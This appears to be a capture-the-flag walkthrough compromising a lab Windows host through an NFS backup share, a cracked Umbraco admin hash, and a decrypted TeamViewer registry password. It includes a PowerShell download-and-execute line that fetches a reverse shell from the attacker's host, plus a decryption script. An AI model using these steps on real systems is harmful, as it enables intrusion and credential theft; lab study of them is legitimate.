Information gathering
IP Address | Open Ports
---|---
10.10.10.180 | TCP: 21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680
nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Umbraco && NFS
$ whatweb http://10.10.10.180/ -v
$ showmount -e 10.10.10.180
$ sudo mkdir -p /mnt/10.10.10.180
$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180
$ strings App_Data/Umbraco.sdf | grep admin
username:adminadmin@htb.local
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa
$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force
password:baconandcheese
Login
http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco
https://www.exploit-db.com/exploits/46153
Reverse shell
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1
Deliver the PowerShell script to the target (the modified command string in exp.py):
string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.24/Invoke-PowerShellTcp.ps1')";
$ python exp.py
User.txt
c9b78c488c6ae1828b13d050b156d542
Privilege escalation
TeamViewer application
The msf module notes that the registry path for Version7 is HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7
PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }
#!/usr/bin/env python3
# Decrypt the SecurityPasswordAES registry value: AES-128-CBC under TeamViewer's
# static key and IV; the plaintext is the password in UTF-16LE followed by NUL padding.
from Crypto.Cipher import AES  # pycryptodome
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
# The 32 bytes read from HKLM:\...\TeamViewer\Version7\SecurityPasswordAES above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
                    126, 141, 55, 107, 38, 57, 78, 91])
aes = AES.new(key, AES.MODE_CBC, iv=iv)
# Decode explicitly as UTF-16LE so the result does not depend on the host's byte order
password = aes.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")
print(f"[+] Found password: {password}")
$ python dec.py
$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'
$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Root.txt
858343dff7922d618a28508565307822